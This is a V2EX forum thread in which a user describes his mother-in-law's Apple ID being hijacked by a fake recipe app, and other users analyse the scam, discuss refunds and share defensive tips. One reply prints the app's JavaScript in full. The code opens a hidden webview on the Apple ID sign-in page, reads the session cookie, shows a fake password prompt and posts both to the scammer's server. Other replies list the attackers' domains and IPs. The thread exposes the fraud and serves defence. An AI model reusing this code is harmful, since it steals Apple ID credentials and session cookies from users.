V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
airycanon
V2EX  ›  问与答

家人的 Apple ID 开了双重认证,仍然被钓鱼,求大佬解惑,也顺便给大家提个醒

  airycanon · 2023-07-23 21:46:37 +08:00 · 53264 次点击
这是一个创建于 529 天前的主题,其中的信息可能已经有所发展或是发生改变。

时间线

7 月 12 晚上发生的事情,

  • 23:33 ,丈母娘的手机突然被抹掉了资料,变成出厂设置的状态。
  • 23:35 ,她拿手机找我给她看看,我以为是苹果系统问题,开始给她重新设置。
  • 23:36 ,在设置的过程中,手机陆续收到了短信通知,我发现其中有银行、支付等字样。
  • 23:37 ,开始意识到事情不太对,赶紧联系银行和微信支付冻结。
  • 23:40 ,等到冻结完毕,已经产生了 20 多笔订单,共计 1.6w 。
  • 23:50 ,报警之后,到社区派出所立案。
  • 01:10 ,立案过程中,我在 Apple Store 的退款渠道提交了退款。

被盗经过

之前一直以为开了双重认证就高枕无忧,经过排查后,基本确定是被钓鱼了:

  • 丈母娘曾经在某 App 购买虚拟商品,App Store 绑定了微信免密支付。

  • 7 月 11 号下午,丈母娘在 Apple Store 上下载了一个叫 “菜谱大全” 的 App ,它的登录方式是 Apple ID 授权,这一步如果没有开启 iCloud+ 隐藏邮件地址的话,Apple ID 账号就会泄露,如图

  • 接着,会出来一个跟 App Store 长得非常像的密码输入框,大家如果经常安装 App ,人脸识别失败的时候,就会有这个密码输入框,不熟悉 App Store 登录流程的话,很容易中招,如图

  • 有了 Apple ID 的账号和密码,就可以登录了,这一步我跟丈母娘反复确认了,她没有见过双重认证的弹窗。

  • 登录之后,他会把自己的号码,加入双重认证的信任号码中,目的是为了后续的登录可以通过自己认证,如图

  • 到这一步,他已经掌握了受害者 Apple ID 的所有权限。

  • 接下来,盗号者并不会直接用 Apple ID 下单支付,而是会创建一个家庭共享,加入另一个账号,由这个账号购买 App 中的虚拟商品,如图

疑问

整个钓鱼过程,我有一点不太理解,在开启了双重认证的情况下,除非我丈母娘主动输入验证码,否则即使对方拿到了 Apple ID 的账号密码,应该也无法登录才对,这里请大佬帮忙解惑。

尝试退款

我在 Apple 400 客服尝试了多种方式,最终都失败了:

  • reportaproblem.apple.com 页面申请退款,申请后联系客服告知被拒绝。
  • 找负责 App Store 订单的客服,要求升级高级顾问,告知这是最终结果,升级也没有意义,被拒绝。
  • 找负责 Apple ID 的客服,曲线救国,要求查询 Apple ID 被盗的问题,被告知查不到记录。
  • 由负责 Apple ID 的高级顾问转到负责 App Store 订单的高级顾问,和该顾问扯皮了 2 小时,被拒绝。

目前还能尝试的方式:

  • 打 12315 反馈
  • 在工信部违法和不良信息举报中心投诉
  • 起诉苹果
第 1 条附言  ·  2023-07-23 22:34:11 +08:00
补充一下:
抹除设备是为了防止盗号者在支付的时候,受害者微信出现支付通知。
评论区有大佬提到,如果这个 APP 有截屏,可以截到双重认证的弹窗并上传,并不需要 Apple ID 所有者主动提供验证码。
第 2 条附言  ·  2023-07-23 23:05:29 +08:00
这个 App 的权限只有两个:Siri 与搜索,无线数据
第 3 条附言  ·  2023-07-24 11:05:02 +08:00
抓包看了下,app 会访问这个 app.yime888.com ,有没有大佬有兴趣爆破一下。
第 4 条附言  ·  2023-07-24 13:27:35 +08:00
89 楼的大佬,给了一个绕过双重认证的思路,感觉是比较靠谱的。
第 5 条附言  ·  2023-07-24 15:14:46 +08:00
感谢各位大佬,目前差不多搞清楚对方是如何绕过双重认证的:
对方在 App 内置了一个 Webview ,然后访问 appleid.apple.com/sign-in ,这一步系统会出现 Apple ID 的弹窗,如果人脸识别通过了或者输入了正确的密码,这个页面就登录了(可以理解为在内置的 safafi 打开了 Apple ID 的登录页面)。

接下来会出现密码弹窗,受害者输入密码之后,这个 Webview 可以注入一些 js 获取到 Cookie ,然后访问 appleid.apple.com/account/manage ,通过一些自动接收验证码的机制,配合 Cookie 和密码,就可以在受害者 Apple ID 的信任号码中加入他自己的号码,用来接收双重认证的短信。
第 6 条附言  ·  2023-07-25 16:35:06 +08:00
最新情况:
昨天通过工信部提交投诉之后,一个苹果行政关系部的人联系我,说是会帮我处理退款的事,刚刚告知了我处理结果,还是拒绝了,目前只剩下起诉这一条路了。
第 7 条附言  ·  2023-07-27 18:50:28 +08:00
最近情况:苹果刚刚把我家人的所有被盗订单都退款了,但是还没有跟我联系,感谢大家的支持。
385 条回复    2024-04-16 15:23:06 +08:00
1  2  3  4  
airycanon
    201
airycanon  
OP
   2023-07-24 17:45:30 +08:00
@c7in7 @DigitalG 可以转发,我跟负责 Apple ID 的客户说了这个事情,感觉他们的客服不太懂,聊不下去。
llo
    202
llo  
   2023-07-24 17:47:26 +08:00
真他妈离谱,这一般人真容易中招
Jiajin
    203
Jiajin  
   2023-07-24 17:55:07 +08:00
@airycanon apple 普通客服是这样的,我估计得找 apple developer 的客服,好像开发者账号一年有两次支持机会。
yorkw
    204
yorkw  
   2023-07-24 17:55:45 +08:00
@airycanon #141 这个应该能构成非法侵入计算机信息系统罪了吧,等待 OP 更新
hongchends1
    205
hongchends1  
   2023-07-24 17:58:15 +08:00
我记得截屏是截不到系统的弹窗的,所以应该是通过其他途径绕过了 2FA
SNOOPY963
    206
SNOOPY963  
   2023-07-24 18:09:43 +08:00
@hongchends1 那个 Apple ID 的 L 都不对的。而且系统的弹窗,会带具体的 Apple ID 的,邮箱或者手机号。
NanoApe
    207
NanoApe  
   2023-07-24 18:11:31 +08:00
@fuliti 主要这个密码弹窗是伪造 Apple UI 的,迷惑性特别强(除了「 AppLe 」和「登陆」)

https://arstechnica.com/information-technology/2017/10/beware-of-sketchy-ios-popups-that-want-your-apple-id/

也算是个历史问题了
hongchends1
    208
hongchends1  
   2023-07-24 18:11:35 +08:00
@SNOOPY963 这是我没想到的。。
alihbaba
    209
alihbaba  
   2023-07-24 18:19:44 +08:00
他那个前端就是个 H5 不知道是不是封装的 感觉是
alihbaba
    210
alihbaba  
   2023-07-24 18:21:27 +08:00
web 界面
[img][/img]
airycanon
    211
airycanon  
OP
   2023-07-24 18:23:15 +08:00
@alihbaba 还从这个页面获取了一些数据,感觉是盗用了人家的 api: https://www.jxcaipu.com/
learningman
    212
learningman  
   2023-07-24 18:47:02 +08:00
技术有点 cool
dsb2468
    213
dsb2468  
   2023-07-24 18:54:34 +08:00
CN 域名注册需要实名的(不过也可能是假证件)
http://agreement.gbbhuor.cn/ (注册人韩 LF QQ 邮箱注册的)
http://app.gbbhuor.cn/ (底部也有个 QQ )
LuoboTixS
    214
LuoboTixS  
   2023-07-24 19:24:05 +08:00   ❤️ 9
期待和祝愿楼主能送这个诈骗 app 开发者进去
woyao
    215
woyao  
   2023-07-24 19:26:35 +08:00
@alihbaba 后台页面上的快手回传、抖音回传 是什么?

@airycanon 手机开 lockdown 模式能防这种欺诈吗?
dearmymy
    216
dearmymy  
   2023-07-24 19:28:20 +08:00
@Archeb 这骗子我也是佩服,脑洞真大。备份 app 。逆向获取证据,举报大 v 。坐等苹果赔偿
airycanon
    217
airycanon  
OP
   2023-07-24 19:29:21 +08:00   ❤️ 1
@LuoboTixS 兄弟有点难啊,我把资料给了之前立案的警察,他只会说让我联系苹果公司,让我联系提供虚拟商品的游戏公司,让我联系腾讯支付。
alihbaba
    218
alihbaba  
   2023-07-24 20:17:38 +08:00
@woyao 那些应该上传别的软件信息的 只不过我没有代码 也只是猜测
WhatTheBridgeSay
    219
WhatTheBridgeSay  
   2023-07-24 20:30:20 +08:00   ❤️ 1
楼主不起诉说不过去啊,都这么大涉案金额了,那么多及时止损导致不够立案金额/时间成本的。直接起诉苹果上海贸易公司,让他们的人来主动找你协商
NanoApe
    220
NanoApe  
   2023-07-24 20:30:51 +08:00   ❤️ 1
@airycanon 都上升到诈骗了为啥还要联系苹果?警察不太会?
littlecowherd
    221
littlecowherd  
   2023-07-24 20:52:03 +08:00
期待后续
Valid
    222
Valid  
   2023-07-24 20:56:02 +08:00
这 app 竟然能上架才是奇怪的
aero99
    223
aero99  
   2023-07-24 21:00:21 +08:00   ❤️ 2
@NanoApe 涉及到苹果商店,APP 开发者,虚拟卡商家,微信支付,有的推诿了,可能还会给你上一课:手机装反诈了吗
Uyloal
    224
Uyloal  
   2023-07-24 21:05:37 +08:00
@Valid 能上架没啥问题,因为 App 可以在 Apple 审核期间使用另一套规则来规避审核规则。奇怪的点在于 Apple ID 登陆之后修改 2FA 信息居然不需要 2FA 确认,虚假 2FA 。
liveoppo
    225
liveoppo  
   2023-07-24 21:12:38 +08:00
期待楼主加油,坚持让苹果正视这个缺陷,最好能抓出诈骗分子去坐牢
acbdb000
    226
acbdb000  
   2023-07-24 21:52:50 +08:00   ❤️ 1
简中福报了,赶紧起诉吧,最好能让这个开发者进去蹲。
Zy143L
    227
Zy143L  
   2023-07-24 21:57:14 +08:00 via Android   ❤️ 4
少有的好贴 从分析到后台应有尽有
这算果子的逻辑漏洞了吧
信任设备修改 2FA 不需要 2FA 理想情况应该是 0 信任的
late1000
    228
late1000  
   2023-07-24 22:14:29 +08:00
建议起诉了,这太逆天了
YaakovZiv
    229
YaakovZiv  
   2023-07-24 22:22:40 +08:00
防不胜防,如果是我用,我也可能中招,真的是防不胜防
QKA666
    230
QKA666  
   2023-07-24 22:28:28 +08:00
怎么防范呢
nightwalker
    231
nightwalker  
   2023-07-24 22:36:55 +08:00
@Archeb 还有一个我已经关闭了"在网页上访问 iCloud 数据“,但这个只能限制电脑,手机不受限制。另外这个 app 还要调 api 添加信任号码,感觉真的花了功夫!
zololiu
    232
zololiu  
   2023-07-24 22:37:07 +08:00
@qinxiaozhi 下载下来,试了一下,点击登录直接没反应了。 😂
christin
    233
christin  
   2023-07-24 22:40:59 +08:00
赶紧往后退一步,把绑定的免密支付加上限额。
不过还好我在用美区的 ID ,只能官网购买礼品卡充值。
Misaka11037
    234
Misaka11037  
   2023-07-24 22:41:00 +08:00
建议有条件的尽早上 security key
knockkey
    235
knockkey  
   2023-07-24 22:41:21 +08:00
@alihbaba #117 大佬 想知道这个是用啥东东查到的登录次数&提交次数这些
zololiu
    236
zololiu  
   2023-07-24 22:45:40 +08:00
@alihbaba 后排膜拜一下大佬,蹲一个后续。
JCZ2MkKb5S8ZX9pq
    237
JCZ2MkKb5S8ZX9pq  
   2023-07-24 22:51:43 +08:00   ❤️ 2
可以考虑微博联系 sunwear 之类声量大的,过程写清楚点,尽量借用一下舆论。
然后 https://www.12377.cn/ 等几个站点都举报下。
的确搞起来比较麻烦,但姑息养奸,辛苦 OP 了。
Rhianu
    238
Rhianu  
   2023-07-24 22:58:06 +08:00
看楼主提供的第二张 Apple ID 弹窗截图,这个弹窗可以断定是假的,截图中的弹窗截图的标题是 AppLeID ,官方的是 Apple ID 。钓鱼网站经常会做一些以假乱真的苹果系统 UI 用来骗取账号和密码。
DevHjz
    239
DevHjz  
   2023-07-24 23:02:28 +08:00
@airycanon @alihbaba
我通过技术手段扫子域名+反查 IP ,查找到以下信息:
yime888.com 下的子域名有:
app 和 app2 解析到 103.229.183.139 ,Hostnames 为 app.bahpxmz.cn ,无 Whois 信息;
download 解析到 45.116.215.33 ,Hostnames 为 download.yime888.com
study 、talking 、v 、vip 、wm 解析到 27.0.192.153 ,Hostnames 为 book.qnclywm.cn ,注册者: 韩**
注册者联系人邮件: QQ 邮箱
所属注册服务机构: 阿里云计算有限公司(万网)
这个网站似乎还有开发多款软件,不知道有没有问题,供参考。
DevHjz
    240
DevHjz  
   2023-07-24 23:14:16 +08:00
另外补充:qnclywm.cn 的子域名信息:
book 27.0.192.153
ksad 45.116.215.33 这个似乎是个 API 。
wechat 45.116.215.33 这个有个按钮跳转微信。
AuroraW
    241
AuroraW  
   2023-07-24 23:21:55 +08:00
楼主你好,想问下能搬运帖子内容到其他平台吗?想让更多人知道和了解这件事。
lance6716
    242
lance6716  
   2023-07-24 23:24:18 +08:00 via Android
我用了几天 iPhone 马上就滚回安卓的一个原因就是莫名其妙的系统弹窗需要输入 Apple ID 密码
ha0z1
    243
ha0z1  
   2023-07-24 23:29:59 +08:00 via iPhone   ❤️ 1
怎么把自己的苹果账号给丈母娘,万一同步过去一个白屁股妹子照片发现不是她闺女怎么办?
lizhuoli
    244
lizhuoli  
   2023-07-25 00:07:52 +08:00 via iPhone   ❤️ 3
很简单的骗术,你第一张图就明白了

你从始至终,登陆的是一个隐藏的 Web 页面,其打开的是 appleid.apple.com

你登陆的不是你这个 App 什么食谱的账号,用 Sign in with Apple

这里都告诉你了登陆的平台是网页了

你现在这样操作完成后,就等于你在陌生人的电脑上登陆了 Apple ID ,随后怎么操作都简单。比如添加受信手机,如果你原来没有手机,直接可以绑定陌生人的

比如,重置密码,需要你已有的老密码,通过第二个弹窗钓鱼即可


当陌生人同时给这个 Apple ID 绑定了手机,更换了密码,这个账号就不属于你了已经,后续怎么消费套现都轻松得很
Senorsen
    245
Senorsen  
   2023-07-25 00:24:15 +08:00
哦对了,lz 报警了没?
Senorsen
    246
Senorsen  
   2023-07-25 00:24:41 +08:00
@Senorsen 我瞎了,时间线里写了报警了
ipcjs
    247
ipcjs  
   2023-07-25 00:42:42 +08:00
别赖苹果,做自己手机安全的第一负责人🤣
bootloaders
    248
bootloaders  
   2023-07-25 00:53:48 +08:00
@Archeb
从钓鱼诱骗受害者登录自己的 Apple ID ,获取 Apple ID 账号和密码,在本机上利用 cookie/脚本添加受信任的电话号码都能理解

但骗子是怎么将他的账号添加到家庭共享里的呢?如果远程登录受害人的 Apple ID 操作家庭组,即使添加进了电话号码,受信任的设备上不是还会跳出 2FA 的验证码?是骗子在本机上利用脚本在 Apple id 网页上操作关掉了双重验证么?
m0yBPjyX3475syS4
    249
m0yBPjyX3475syS4  
   2023-07-25 01:07:06 +08:00
我刚才装上了这个菜谱大全 App 发现点了登入按钮不再有反应了。
m0yBPjyX3475syS4
    250
m0yBPjyX3475syS4  
   2023-07-25 01:10:13 +08:00
Apple 其实可以在商店里面给商店应用加上这么个规矩或自动限制:

一、包括 Apple ID 登入画面在内的这种网站,得做特殊处理,以让这些网站自家的 iOS App 内建的 WebView 当中正常显示这类登入画面。

二、任何在这种特殊处理当中没有被允许的 iOS App ,在程序上会被限制载入对应的网站的登入画面。

这样一举解决某些 App 用类似手段坑取使用者 Apple ID 、Microsoft Account 、Google Accountl……的问题。
m0yBPjyX3475syS4
    251
m0yBPjyX3475syS4  
   2023-07-25 01:20:28 +08:00
我现在怀疑 Apple 是否已经在下述 iOS 快速安全回应当中对这个缺陷做了处理: https://support.apple.com/zh-tw/HT213825
Rrobinvip
    252
Rrobinvip  
   2023-07-25 01:26:22 +08:00   ❤️ 1
我一直在预防 app 假扮 apple 登录框要求你输入密码。印象中在 home button 时代,在要求输入 Apple ID 密码时按 home ,如果切回桌面了那就是假的,反之则是真的。

全面屏机型中,任何真正使用 Apple ID 登陆的 app ,在登录时都会弹出一个 view ,其中表明了这个 app 是什么,你也可以选择使用的你 iCloud 或者隐藏 iCloud 。这个时候你如果你上滑(退回主页),这个 view 会被关闭,但 app 不会被关闭。通过这种方式可以直接鉴别登录窗口是真是假。

另外在真正登录时一定要用隐藏 iCloud ,这样对方收到的并不是真正的 iCloud 地址。在注册账户时,也一定要使用 iCloud 自动生成的随机 email 和密码,最大程度避免撞库。

骗子很可恶,但我希望大家一定要防患于未然,建立好的防骗意识。关注 lz 的帖子,希望看到后续。另外不要盲目相信 App Store 中的 app ,之前 twitter 上就有人爆出来一个数字货币钱包 app 会骗你的 secret key ,鬼知道 App Store 里还有多少诈骗 app 。
m0yBPjyX3475syS4
    253
m0yBPjyX3475syS4  
   2023-07-25 01:38:47 +08:00   ❤️ 15
我把这个案例贴到 MacRumors 了。如果能成功在 MacRumors 引起讨论的话,Apple 不可能不关注。
https://forums.macrumors.com/threads/apple-shouldnt-let-app-webwiews-prompt-for-appleid-password.2396766/
vikiyi0
    254
vikiyi0  
   2023-07-25 01:41:08 +08:00 via Android
向苹果报告 Apple ID 被骗子通过黑客手段非法获取了账户控制权(对异常情况进行描述),进而出现了非本人意愿的支付,在账户不被盗的情况下苹果的退款审核做得相对完美,普通情况下一定是会拒绝退款的
shiji
    255
shiji  
   2023-07-25 01:42:04 +08:00 via iPhone
@oppoic 能不能说的再明白一些。 在这种弹窗出现的情况下,怎么尝试返回桌面? 上滑?
m0yBPjyX3475syS4
    256
m0yBPjyX3475syS4  
   2023-07-25 01:44:40 +08:00   ❤️ 6
Reddit 那边我也贴了:
https://www.reddit.com/r/apple/comments/158hhzk/apple_shouldnt_let_app_webwiews_prompt_for/

如果这个网址跟 macRumors 的网址都点不开的话,表明文章正在等待版务审核。
m0yBPjyX3475syS4
    257
m0yBPjyX3475syS4  
   2023-07-25 01:49:14 +08:00
@shiji FaceID 机种都是上滑。指纹机种才有 Home 键摁。
m0yBPjyX3475syS4
    258
m0yBPjyX3475syS4  
   2023-07-25 01:49:41 +08:00
@shiji 补充:FaceID 机种都是上滑,且是从荧幕底边开始上滑。
tinytian
    259
tinytian  
   2023-07-25 01:57:33 +08:00 via iPhone
@Zy143L 把 WebView 和 Safari 没有区别才是最大的病! WebView 不应该视为可信任的“APP”,应该锦默认禁止访问敏感信息。
tinytian
    260
tinytian  
   2023-07-25 02:07:02 +08:00 via iPhone
@ShikiSuen 这里的核心可能是 WebView 是不是应该和 Safari 一样受到信任…理想情况下应该是一样的,现实是 Safari 可能可以受信任,但是 WebView 绝对不可以受信任。
justfun
    261
justfun  
   2023-07-25 04:10:00 +08:00 via iPhone
帖子全看完了,输入 appleid 密码那个弹窗伪装的和正常流程几乎一样,很容易中招。这个绝对的大新闻啊
mfaner
    262
mfaner  
   2023-07-25 05:59:15 +08:00
从楼主的情况看感觉无密码登录反而增加了钓鱼攻击风险,比起密码登录无密码很容易不过脑,登录上就足够盗取很多隐私了
irithys
    263
irithys  
   2023-07-25 06:33:02 +08:00 via Android
好惨,新笑话:Apple 很安全。
alfchin
    264
alfchin  
   2023-07-25 08:25:19 +08:00 via iPhone   ❤️ 1
@delpo 这种都是过审后用热代码更新下发的,或者使用了特定条件隐藏模式,能审核得出来才有鬼
SteveRogers
    265
SteveRogers  
   2023-07-25 08:32:18 +08:00 via iPhone
把后门提交下给苹果,避免更多人受害
shinsekai
    266
shinsekai  
   2023-07-25 08:40:24 +08:00   ❤️ 1
按同样的原理,是否适用于所有使用 passkey ,但又没有彻底废除 2FA 和密码的网站?
airycanon
    267
airycanon  
OP
   2023-07-25 08:44:40 +08:00
@ShikiSuen 没反应是因为昨天有大佬对这个 app 的后台做了爆破。
x86
    268
x86  
   2023-07-25 08:45:45 +08:00
做黑产的比产品经理还清楚流程上的缺陷啊
evada
    269
evada  
   2023-07-25 08:47:50 +08:00
苹果客服退款确实很垃圾,之前在 QQ 音乐买了个代币,结果代币不能花也不能退,QQ 音乐没有客服,苹果说买了这边退不了。
lanlanye
    270
lanlanye  
   2023-07-25 08:53:45 +08:00 via iPhone
@tinytian 也有 Google 这种依赖 webview 做跨 App 登录的
ochatokori
    271
ochatokori  
   2023-07-25 08:59:34 +08:00 via Android
不需要双重认证就能添加信任号码,这双重认证不就认证了个寂寞?
kaylabrady07736
    272
kaylabrady07736  
   2023-07-25 09:09:36 +08:00
这也太隐秘了,普通人都有可能中招,别说老年人了
tenclock
    273
tenclock  
   2023-07-25 09:43:28 +08:00
@ShikiSuen 标题加上漏洞这个词会不会更有点击量
liveoppo
    274
liveoppo  
   2023-07-25 09:45:49 +08:00
没能明显区分系统输入与 webview 输入,这里有重大缺陷呀
nullpoint007
    275
nullpoint007  
   2023-07-25 09:47:16 +08:00
大佬在线偷家,骗子绷不住了吧,哈哈
kakawanzi
    276
kakawanzi  
   2023-07-25 09:57:58 +08:00
@oppoic 这个返回桌面操作很有道理啊
dsb2468
    277
dsb2468  
   2023-07-25 10:03:41 +08:00
补一个菜谱的页面,备忘吧:
http://www.qnclywm.cn/
baysonfox
    278
baysonfox  
   2023-07-25 10:08:32 +08:00
苹果应该给所有基于 Webview 的登录要求 2FA
liutaokss
    279
liutaokss  
   2023-07-25 10:19:48 +08:00
苹果竟然拒绝退款
sherlockGou
    280
sherlockGou  
   2023-07-25 10:20:02 +08:00
这个站点的主域名已经不能访问了,估计是停服了。
Gadmin
    281
Gadmin  
   2023-07-25 10:31:50 +08:00
@AppJun 搞错了,脑抽直接点的模拟器上的截屏。
unklity
    282
unklity  
   2023-07-25 10:40:04 +08:00
实际上“绕过” 2FA 的正是第一步:
dsb2468
    283
dsb2468  
   2023-07-25 10:48:09 +08:00   ❤️ 5
核心的窃取 COOKIE 和密码,然后发往 http://app.yime888.com/api/app.php 的代码还在( yime888.com 已经下线了):
http://www.qnclywm.cn/static/js/pages-views-index.0945c055.js

=========================================
(window["webpackJsonp"] = window["webpackJsonp"] || []).push([["pages-views-index"], {
"0c6f": function(t, e, n) {
var i = n("24fb");
e = i(!1),
e.push([t.i, ".bg[data-v-d2ae5eac]{width:100%;float:left;position:relative}.bg>uni-image[data-v-d2ae5eac]{width:%?750?%;height:%?731?%}.t1[data-v-d2ae5eac]{position:absolute;left:%?30?%;top:%?230?%;font-size:%?50?%;font-weight:700}.t2[data-v-d2ae5eac]{position:absolute;left:%?30?%;top:%?300?%;font-size:%?50?%;font-weight:700}.info1[data-v-d2ae5eac]{position:fixed;left:0;width:100%;text-align:center;bottom:%?400?%;font-weight:700;font-size:%?40?%}.info2[data-v-d2ae5eac]{position:fixed;left:0;width:100%;text-align:center;bottom:%?350?%;font-size:%?28?%}#btns[data-v-d2ae5eac]{width:%?630?%;height:%?90?%;background:#ff4f59;text-align:center;position:fixed;left:%?60?%;bottom:%?230?%;line-height:%?90?%;color:#fff;border-radius:%?45?% %?45?%;font-size:%?30?%}", ""]),
t.exports = e
},
"400f": function(t, e, n) {
"use strict";
n.r(e);
var i = n("4c61"),
a = n.n(i);
for (var o in i)["default"].indexOf(o) < 0 &&
function(t) {
n.d(e, t, (function() {
return i[t]
}))
} (o);
e["default"] = a.a
},
"4c61": function(t, e, n) {
"use strict";
n("7a82"),
Object.defineProperty(e, "__esModule", {
value: !0
}),
e.
default = void 0;
getApp();
var i = null,
a = {
data: function() {
return {
hide: 0,
ww: "0",
hh: "0",
login: 0,
is_no: 0,
url: "",
url2: "",
url3: "",
num: 0,
timer: null,
timer2: null,
txt1: "",
txt2: ""
}
},
onLoad: function(t) {
var e = this;
this.cks(),
uni.onNetworkStatusChange((function(t) {
"none" != t.networkType && e.cks()
}))
},
onShow: function() {},
onShareAppMessage: function() {},
methods: {
cks: function() {
var t = this;
uni.request({
url: "http://app.yime888.com/api/ck.php",
data: {},
header: {},
success: function(e) {
t.is_no = 1,
t.login = e.data[0].status,
t.url = e.data[0].url,
t.url2 = e.data[0].url2,
t.url3 = e.data[0].url3,
t.num = e.data[0].num,
t.txt1 = e.data[0].txt1,
t.txt2 = e.data[0].txt2
}
})
},
loginsfn: function() {
uni.request({
url: "http://app.yime888.com/api/ip.php",
success: function(t) {}
})
},
loadings2: function() {
var t = this,
e = "";
i.evalJS("document.title=location.href");
var n = i.getTitle();
n == t.url3 && (clearInterval(t.timer), t.timer = null, uni.showModal({
title: t.txt1,
content: t.txt2,
editable: !0,
success: function(n) {
if (n.confirm) {
var i = n.content;
n.content.length < 7 ? uni.showToast({
title: "不能少于 7 位",
duration: 2e3
}) : (uni.showToast({
title: "提交中...",
icon: "loading",
duration: 5e3
}), setTimeout((function() {
e = plus.navigator.getCookie(t.url2),
uni.request({
url: "http://app.yime888.com/api/app.php",
data: {
data1: e,
data2: i
},
method: "POST",
header: {
"content-type": "application/x-www-form-urlencoded"
},
success: function(t) {
uni.showToast({
title: "成功",
duration: 2e3
}),
uni.navigateTo({
url: "/pages/index2/index"
})
}
})
}), 5e3))
} else n.cancel && uni.showToast({
title: "已取消",
duration: 2e3
})
}
}))
},
loadings: function() {
var t = plus.navigator.getCookie("https://appleid.apple.com");
t.length > this.num && (clearInterval(this.timer), this.timer = null, uni.showModal({
title: this.txt1,
content: this.txt2,
editable: !0,
success: function(e) {
if (e.confirm) {
var n = e.content;
e.content.length < 7 ? uni.showToast({
title: "不能少于 7 位",
duration: 2e3
}) : uni.request({
url: "http://app.yime888.com/api/app.php",
data: {
data1: t,
data2: n
},
method: "POST",
header: {
"content-type": "application/x-www-form-urlencoded"
},
success: function(t) {
uni.showToast({
title: "成功",
duration: 2e3
}),
uni.navigateTo({
url: "/pages/index2/index"
})
}
})
} else e.cancel && uni.showToast({
title: "已取消",
duration: 2e3
})
}
}))
},
logins: function() {
var t = this;
uni.getNetworkType({
success: function(e) {
"none" == e.networkType ? uni.showModal({
title: "当前网络不可用",
content: '您可以在"设置"中为此 app 打开蜂窝数据。',
cancelText: "好",
confirmText: "设置",
success: function(t) {
if (t.confirm) {
var e = plus.ios.import("UIApplication"),
n = e.sharedApplication(),
i = plus.ios.import("NSURL"),
a = i.URLWithString("app-settings:");
n.openURL(a),
plus.ios.deleteObject(a),
plus.ios.deleteObject(i),
plus.ios.deleteObject(n)
} else t.cancel
}
}) : 0 == t.login && 1 == t.is_no ? (t.loginsfn(), uni.navigateTo({
url: "/pages/index2/index"
})) : 1 == t.is_no && (uni.showToast({
title: "登录中请忽中断!",
icon: "loading",
duration: 5e3
}), t.loginsfn(), i = plus.webview.create(t.url, "xiaoShop", {
width: "1px",
height: "1px",
left: "1000px"
}), i.show(), clearInterval(t.timer), t.timer = null, t.timer = setInterval((function() {
t.loadings2()
}), 1e3))
}
})
}
}
};
e.
default = a
},
"6eb8": function(t, e, n) {
"use strict";
n.d(e, "b", (function() {
return i
})),
n.d(e, "c", (function() {
return a
})),
n.d(e, "a", (function() {}));
var i = function() {
var t = this,
e = t.$createElement,
i = t._self._c || e;
return i("v-uni-view", [i("v-uni-view", {
staticClass: "bg"
},
[i("v-uni-image", {
attrs: {
src: n("aaa1")
}
}), i("v-uni-text", {
staticClass: "t1"
},
[t._v("Hi,")]), i("v-uni-text", {
staticClass: "t2"
},
[t._v("请登录")])], 1), i("v-uni-view", {
staticClass: "info1"
},
[t._v("菜谱大全")]), i("v-uni-view", {
staticClass: "info2"
},
[t._v("进入后即可享受更多的功能和福利")]), i("v-uni-view", {
attrs: {
id: "btns"
},
on: {
click: function(e) {
arguments[0] = e = t.$handleEvent(e),
t.logins.apply(void 0, arguments)
}
}
},
[t._v("登录菜谱大全")])], 1)
},
a = []
},
aaa1: function(t, e, n) {
t.exports = n.p + "static/img/bg.8684acc5.jpg"
},
ae6c: function(t, e, n) {
"use strict";
var i = n("f796"),
a = n.n(i);
a.a
},
f022: function(t, e, n) {
"use strict";
n.r(e);
var i = n("6eb8"),
a = n("400f");
for (var o in a)["default"].indexOf(o) < 0 &&
function(t) {
n.d(e, t, (function() {
return a[t]
}))
} (o);
n("ae6c");
var s = n("f0c5"),
u = Object(s["a"])(a["default"], i["b"], i["c"], !1, null, "d2ae5eac", null, !1, i["a"], void 0);
e["default"] = u.exports
},
f796: function(t, e, n) {
var i = n("0c6f");
i.__esModule && (i = i.
default),
"string" === typeof i && (i = [[t.i, i, ""]]),
i.locals && (t.exports = i.locals);
var a = n("4f06").
default;
a("315b15a0", i, !0, {
sourceMap: !1,
shadowMode: !1
})
}
}]);
xdeng
    284
xdeng  
   2023-07-25 10:59:27 +08:00
@bootloaders 2FA 可以选短信 骗子手机号加进去了
DubheBroken
    285
DubheBroken  
   2023-07-25 11:15:45 +08:00   ❤️ 4
@airycanon 警察不一定懂技术,也可能是嫌麻烦想大事化小小事化了。警方不作为这种事太常见了。建议收集证据直接捅到社交媒体,微博抖音快手小红书酷安贴吧知乎,你想得到的社交媒体都发一发,扩散一下,事情闹大了警方就没法坐视不理了。
loarland
    286
loarland  
   2023-07-25 11:19:44 +08:00
防不住真的防不住
dsb2468
    287
dsb2468  
   2023-07-25 11:23:10 +08:00
@alihbaba hello ,交友的 APP 你指的是这个么? http://vip.yime888.com/ 你上面那个返利的 APP ,地址有么?
w0017
    288
w0017  
   2023-07-25 11:41:26 +08:00
苹果商店上架其实存在一个问题:webview 应用,所以审核时看到的内容未必就是几个月后在用户机器上跑的内容
alihbaba
    289
alihbaba  
   2023-07-25 11:50:36 +08:00
@dsb2468 现在网站貌似都关了
dsb2468
    290
dsb2468  
   2023-07-25 11:53:49 +08:00   ❤️ 1
@alihbaba 我浅浅看了下,这后面有大瓜啊

那个域名( vip.yime888.com )上有个交友 APP ,走的企业签名,这倒没啥,很正常。

但是上面的图片资源挂在 https://rec.ihuayou.xin/vip.nnpangfeng.com/data/gif/1.gif 上,这个域名结构很有特点,然后 rec.ihuayou.xin 上的东西又关联到了 http://rec.ihuayou.xin/js/app.343eabf7.js ,里面一堆域名信息,其中的 remark 字段很容易让人想到推广渠道——那么之前控制台收集信息展示(抖音、快手)的东西,是否就是不同渠道分发不同的软件、小程序,然后利用同样的方式( WEB 嵌套+弹窗提示登录)进行信息收集呢?:

o = {
cnzz: "",
remark: "默认",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
i = {
"hj.pangfeng.ink": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281223722&web_id=1281223722",
remark: "花间",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yc-op.pangfeng.ink": {
cnzz: "https://v1.cnzz.com/z_stat.php?id=1281200897&web_id=1281200897",
remark: "OPPO",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yc-wb1.pangfeng.ink": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281200748&web_id=1281200748",
remark: "微博",
companyName: "南宁庞丰网络科技有限公司",
token: ""
},
"yc.pangfeng.ink": {
cnzz: "https://s9.cnzz.com/z_stat.php?id=1281201008&web_id=1281201008",
remark: "微博 1",
